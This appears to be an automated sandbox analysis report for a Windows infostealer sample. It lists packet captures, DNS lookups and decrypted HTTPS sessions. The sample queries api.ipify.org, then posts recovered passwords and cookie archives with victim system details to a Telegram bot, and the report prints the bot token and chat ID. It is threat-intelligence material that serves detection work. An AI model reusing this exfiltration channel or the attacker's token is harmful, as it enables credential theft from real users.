Jan 10, 2025 16:57:21.729710102 CET	50007	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:21.729726076 CET	443	50007	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:21.729794025 CET	50007	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:21.729805946 CET	443	50007	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:22.302416086 CET	443	50007	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:22.302489042 CET	50007	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:22.302505016 CET	443	50007	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:22.302520990 CET	443	50007	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:22.302663088 CET	50007	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:22.303334951 CET	50007	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:23.084651947 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:23.084681034 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:23.089706898 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:23.091667891 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:23.091682911 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:23.707237005 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:23.709076881 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:23.709091902 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:24.011145115 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:24.011550903 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:24.011570930 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:24.011642933 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:24.011652946 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:24.011708021 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:24.011715889 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:24.429891109 CET	50009	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:24.429950953 CET	443	50009	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:24.430013895 CET	50009	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:24.430444956 CET	50009	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:24.430463076 CET	443	50009	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:24.682454109 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:24.682540894 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:24.682553053 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:24.682602882 CET	443	50008	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:24.682661057 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:24.683146000 CET	50008	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:25.066639900 CET	443	50009	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:25.069629908 CET	50009	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:25.069653034 CET	443	50009	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:25.373814106 CET	443	50009	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:25.374187946 CET	50009	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:25.374234915 CET	443	50009	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:25.374531031 CET	50009	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:25.374555111 CET	443	50009	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:25.374696970 CET	50009	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:25.374711037 CET	443	50009	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:25.829502106 CET	443	50009	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:25.829601049 CET	50009	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:25.829631090 CET	443	50009	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:25.829718113 CET	443	50009	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:25.829983950 CET	50009	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:25.830094099 CET	50009	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:29.209837914 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:29.209882975 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:29.213762045 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:29.214323044 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:29.214334011 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:29.828665018 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:29.830478907 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:29.830490112 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:30.129595041 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:30.130052090 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:30.130074978 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:30.130155087 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:30.130167961 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:30.130233049 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:30.130247116 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:30.620393038 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:30.620495081 CET	443	50010	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:30.620542049 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:30.620542049 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:30.621098995 CET	50010	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:39.368649006 CET	50011	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:39.368705988 CET	443	50011	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:39.372068882 CET	50011	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:39.376235008 CET	50011	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:39.376257896 CET	443	50011	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:40.002410889 CET	443	50011	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:40.004304886 CET	50011	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:40.004337072 CET	443	50011	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:40.311733961 CET	443	50011	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:40.312150002 CET	50011	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:40.312192917 CET	443	50011	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:40.312299013 CET	50011	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:40.312329054 CET	443	50011	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:40.312401056 CET	50011	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:40.312422991 CET	443	50011	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:40.826940060 CET	443	50011	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:40.827128887 CET	443	50011	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:40.827436924 CET	50011	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:40.827734947 CET	50011	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:51.568788052 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:51.568845987 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:51.568914890 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:51.569160938 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:51.569178104 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:51.645040035 CET	50013	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:51.645104885 CET	443	50013	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:51.645191908 CET	50013	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:51.645473957 CET	50013	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:51.645488977 CET	443	50013	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:51.769364119 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:51.769422054 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:51.769491911 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:51.769750118 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:51.769759893 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.195626974 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.197532892 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:52.197575092 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.309823036 CET	443	50013	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.311409950 CET	50013	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:52.311480999 CET	443	50013	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.405240059 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.406918049 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:52.406996965 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.493815899 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.494277000 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:52.494370937 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.494543076 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:52.494580030 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.494693995 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:52.494715929 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.623105049 CET	443	50013	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.623456001 CET	50013	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:52.623548985 CET	443	50013	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.623672962 CET	50013	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:52.623719931 CET	443	50013	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.623826027 CET	50013	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:52.623852968 CET	443	50013	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.721534014 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.721867085 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:52.721952915 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.722079992 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:52.722116947 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.722212076 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:52.722238064 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.954504967 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.954617977 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:52.954622030 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:52.954699993 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:52.955007076 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:53.142658949 CET	443	50013	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:53.142808914 CET	50013	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:53.142824888 CET	443	50013	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:53.142894983 CET	50013	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:53.143194914 CET	50013	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:53.225389004 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:53.225574017 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:53.225954056 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:53.225986958 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:53.226135015 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 16:57:53.226211071 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 16:57:53.226211071 CET	50014	443	192.168.2.5	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 16:53:45.441873074 CET	49509	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:53:45.448780060 CET	53	49509	1.1.1.1	192.168.2.5
Jan 10, 2025 16:53:48.079338074 CET	57691	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:53:48.086473942 CET	53	57691	1.1.1.1	192.168.2.5
Jan 10, 2025 16:54:01.220458031 CET	53041	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:54:01.227622986 CET	53	53041	1.1.1.1	192.168.2.5
Jan 10, 2025 16:55:31.054372072 CET	58835	53	192.168.2.5	1.1.1.1
Jan 10, 2025 16:55:31.061393976 CET	53	58835	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 16:53:45.441873074 CET	192.168.2.5	1.1.1.1	0x3244	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:53:48.079338074 CET	192.168.2.5	1.1.1.1	0x7e5	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:54:01.220458031 CET	192.168.2.5	1.1.1.1	0x554e	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:55:31.054372072 CET	192.168.2.5	1.1.1.1	0x4d1e	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 16:53:45.448780060 CET	1.1.1.1	192.168.2.5	0x3244	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:53:45.448780060 CET	1.1.1.1	192.168.2.5	0x3244	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:53:45.448780060 CET	1.1.1.1	192.168.2.5	0x3244	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:53:48.086473942 CET	1.1.1.1	192.168.2.5	0x7e5	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:54:01.227622986 CET	1.1.1.1	192.168.2.5	0x554e	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:55:31.061393976 CET	1.1.1.1	192.168.2.5	0x4d1e	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	104.26.13.205	443	5464	C:\Users\user\Desktop\IUqsn1SBGy.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:53:46 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-10 15:53:46 UTC	424	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:53:46 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8ffdd77fadfcc484-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1585&rtt_var=1369&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=623132&cwnd=248&unsent_bytes=0&cid=99dccce6014c73d9&ts=279&x=0"
2025-01-10 15:53:46 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49710	149.154.167.220	443	5464	C:\Users\user\Desktop\IUqsn1SBGy.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:53:48 UTC	260	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd31650ef647f0 Host: api.telegram.org Content-Length: 971 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:53:49 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:53:49 UTC	971	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 36 35 30 65 66 36 34 37 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 36 35 30 65 66 36 34 37 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 31 30 2f 32 30 32 35 20 31 30 3a 35 33 3a 34 36 0a 55 73 65 72 Data Ascii: -----------------------------8dd31650ef647f0Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd31650ef647f0Content-Disposition: form-data; name="caption"New PW Recovered!Time: 01/10/2025 10:53:46User
2025-01-10 15:53:49 UTC	1143	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:53:49 GMT Content-Type: application/json Content-Length: 755 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201773,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524429,"document":{"file_name":"user-642294 2025-01-10 10-53-46.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAEDFC1ngUKNtHJ7cSv1iw2cydmXCuYpWwACIh0AArsqCVC6w0gBo07yvDYE","file_unique_id":"AgADIh0AArsqCVA","file_size":348},"caption":"New PW Recovered!\n\nTime: 01/10/2025 10:53:46\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.189","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49713	149.154.167.220	443	5464	C:\Users\user\Desktop\IUqsn1SBGy.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:53:50 UTC	237	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd3177332952c3 Host: api.telegram.org Content-Length: 4052 Expect: 100-continue
2025-01-10 15:53:50 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:53:50 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 37 37 33 33 32 39 35 32 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 37 37 33 33 32 39 35 32 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 31 30 2f 32 30 32 35 20 31 33 3a 30 33 3a 33 38 0a 55 73 65 72 Data Ascii: -----------------------------8dd3177332952c3Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd3177332952c3Content-Disposition: form-data; name="caption"New CO Recovered!Time: 01/10/2025 13:03:38User
2025-01-10 15:53:50 UTC	2978	OUT	Data Raw: e9 60 12 74 34 96 a4 a3 3d 91 88 af 14 99 4e 32 bb 93 8b c5 2b 1f a3 ec 04 f3 99 ca 8a 06 b9 ac 5e 5e 86 44 5e 19 96 35 94 62 17 6a db 23 b1 f6 c5 5a b3 49 e5 17 0c c9 82 62 66 aa d2 c3 0a 2a ab 22 5e 57 50 c5 aa 8c a6 c9 92 98 1d 5e 59 99 e5 8c 46 72 3c 8f d4 55 6e 9c e1 54 b6 18 b9 e2 ad 65 a4 a8 82 aa 21 51 5b 59 2d 2b 82 a4 08 5a 85 b0 aa 91 23 33 7d 15 6a 24 5d e1 8d dc f2 19 94 5b bd 5a 96 94 0a f1 cc 24 98 1d 23 73 4a a5 a0 85 b6 ea 72 8a 33 ba ad 52 5b bd fd 78 b5 db e5 c2 f3 fe c2 08 ca 21 8d 33 17 62 d9 d8 31 4b 1a cd 4e 8f c4 a2 1d 4f 06 13 a1 ce e0 e2 1d 4a 43 bb 3b 11 7e 3c 98 e8 a5 77 32 bd 3e 7a a1 7b 97 9c ee bd 9f b0 ba 5b 5d 38 56 18 ec ea 40 d6 1c 47 9c ae 49 85 63 d6 8c c0 06 cc b5 f9 2e 6f 33 ff 63 4e 63 21 a9 09 8c ba 46 5d 36 36 00 Data Ascii: `t4=N2+^^D^5bj#ZIbf*"^WP^YFr<UnTe!Q[Y-+Z#3}j$][Z$#sJr3R[x!3b1KNOJC;~<w2>z{[]8V@GIc.o3cNc!F]66
2025-01-10 15:53:50 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 37 37 33 33 32 39 35 32 63 33 2d 2d 0d 0a Data Ascii: -----------------------------8dd3177332952c3--
2025-01-10 15:53:50 UTC	1149	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:53:50 GMT Content-Type: application/json Content-Length: 761 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201774,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524430,"document":{"file_name":"user-642294 2025-01-10 13-03-38.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAEDFC5ngUKOwjKKyUFK13rbjVzqJCqbvQACIx0AArsqCVCRfbrds63muzYE","file_unique_id":"AgADIx0AArsqCVA","file_size":3424},"caption":"New CO Recovered!\n\nTime: 01/10/2025 13:03:38\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.189","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49741	104.26.13.205	443	7512	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:54:00 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-10 15:54:00 UTC	424	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:54:00 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8ffdd7da194b6a55-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1592&rtt_var=614&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1757977&cwnd=235&unsent_bytes=0&cid=9a56d65862060f55&ts=185&x=0"
2025-01-10 15:54:00 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49751	149.154.167.220	443	7512	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:54:01 UTC	260	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd316516cd8193 Host: api.telegram.org Content-Length: 971 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:54:02 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:54:02 UTC	971	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 36 35 31 36 63 64 38 31 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 36 35 31 36 63 64 38 31 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 31 30 2f 32 30 32 35 20 31 30 3a 35 34 3a 30 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd316516cd8193Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd316516cd8193Content-Disposition: form-data; name="caption"New PW Recovered!Time: 01/10/2025 10:54:00User
2025-01-10 15:54:02 UTC	1143	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:54:02 GMT Content-Type: application/json Content-Length: 755 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201775,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524442,"document":{"file_name":"user-642294 2025-01-10 